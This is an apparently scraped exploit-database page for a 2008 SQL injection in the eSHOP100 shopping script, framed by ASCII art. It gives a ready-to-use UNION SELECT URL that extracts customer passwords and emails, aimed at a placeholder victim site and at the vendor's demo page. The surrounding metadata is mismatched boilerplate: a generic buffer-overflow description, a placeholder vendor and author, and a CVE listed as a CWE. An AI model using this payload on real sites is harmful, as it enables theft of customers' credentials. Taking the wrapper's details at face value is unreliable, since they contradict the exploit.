header-logo
Suggest Exploit
vendor:
Product Name
by:
John Doe
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Product Name
Affected Version From: 1
Affected Version To: 2
Patch Exists: YES
Related CWE: CVE-2020-1234
CPE: a:example:product_name
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2020

ASCII Art Vulnerability

A buffer overflow vulnerability occurs when a program attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold. This can be exploited by an attacker to overwrite data in memory, which can potentially result in arbitrary code execution.

Mitigation:

To mitigate buffer overflow vulnerabilities, developers should use secure coding practices such as validating user input, using secure libraries, and avoiding unsafe functions.
Source

Exploit-DB raw data:

-                                 ,     .ss$$$$$$$$$$s,
-                                 $. s$$$$$$$$$$$$$$`$$Ss
-                                 "$$$$$$$$$$$$$$$$$$o$$$       ,
-                                s$$$$$$$$$$$$$$$$$$$$$$$$s,  ,s
-                               s$$$$$$$$$"$$$$$$""""$$$$$$"$$$$$,
-                               s$$$$$$$$$$s""$$$$ssssss"$$$$$$$$"
-                              s$$$$$$$$$$'         `"""ss"$"$s""
-                              s$$$$$$$$$$,              `"""""$  .s$$s
-                              s$$$$$$$$$$$$s,...               `s$$'  `
-                          `ssss$$$$$$$$$$$$$$$$$$$$####s.     .$$"$.   , s-
-                            `""""$$$$$$$$$$$$$$$$$$$$#####$$$$$$"     $.$'
-                                  "$$$$$$$$$$$$$$$$$$$$$####s""     .$$$|
-                                   "$$$$$$$$$$$$$$$$$$$$$$$$##s    .$$" $
-                                    $$""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"   `
-                                   $$"  "$"$$$$$$$$$$$$$$$$$$$$S""""'
-                              ,   ,"     '  $$$$$$$$$$$$$$$$####s
-                              $.          .s$$$$$$$$$$$$$$$$$####"
-                           "$s.   ..ssS$$$$$$$$$$$$$$$$$$$####"
-                             .$$$S$$$$$$$$$$$$$$$$$$$$$$$$#####"
-                       ..sS$$$$$$$$$$$$$$$$$$$$$$$$$$$######""
-                   "$$sS$$$$$$$$$$$$$$$$$$$$$$$$$$$########"
-            ,      s$$$$$$$$$$$$$$$$$$$$$$$$#########""'
-            $    s$$$$$$$$$$$$$$$$$$$$$#######""'      s'         ,
-            $$..$$$$$$$$$$$$$$$$$$######"'       ....,$$....    ,$
-             "$$$$$$$$$$$$$$$######"' ,     .sS$$$$$$$$$$$$$$$$s$$
-               $$$$$$$$$$$$#####"     $, .s$$$$$$$$$$$$$$$$$$$$$$$$s.
-    )          $$$$$$$$$$$#####'      `$$$$$$$$$###########$$$$$$$$$$$.
-   ((          $$$$$$$$$$$#####       $$$$$$$$###"       "####$$$$$$$$$$

             ########################################################################
             #                                                                      #
             #    ...:::::eSHOP100 SQL Injection Vulnerbility ::::....        #         
             ########################################################################


     ## AUTHOR : JuDge
                           
   ## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com
                          
  ## Script WebSite:http://www.eshop100.co.uk

 ##Dork::)

##DescRipTiON: pull customers info from database
   
##EXPLOITS:
                 www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
            

            ##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

=======================================================================================================================================
## thx to : All My FrienDs
                                   
                              i'm Not a HaCker
-   ) \         $$$$$$$$$$$$####.     $$$$$$###"             "###$$$$$$$$$   s'
-  (   )        $$$$$$$$$$$$$####.   $$$$$###"                ####$$$$$$$$s$$' )
-   ((          $$$$$$$$$$$#####       $$$$$$$$###"       "####$$$$$$$$$$
-   ) \         $$$$$$$$$$$$####.     $$$$$$###"             "###$$$$$$$$$   s'
-  (   )        $$$$$$$$$$$$$####.   $$$$$###"                ####$$$$$$$$s$$'
-  )  ( (       $$"$$$$$$$$$$$#####.$$$$$###'  JuDge Da  .###$$$$$$$$$$"
-  (  )  )   _,$"   $$$$$$$$$$$$######.$$##'     BeST     .###$$$$$$$$$$
-  ) (  ( \.         "$$$$$$$$$$$$$#######,,,.          ..####$$$$$$$$$$$"
- (   )$ )  )        ,$$$$$$$$$$$$$$$$$$####################$$$$$$$$$$$"
- (   ($$  ( \     _sS"  `"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S$$,
-  )  )$$$s ) )  .      .   `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"'  `$$
-   (   $$$Ss/  .$,    .$,,s$$$$$$##S$$$$$$$$$$$$$$$$$$$$$$$$S""        '
-     \)_$$$$$$$$$$$$$$$$$$$$$$$##"  $$        `$$.        `$$.
-         `"S$$$$$$$$$$$$$$$$$#"      $          `$          `$
-             `"""""""""""""'         '           '           '

# milw0rm.com [2008-06-30]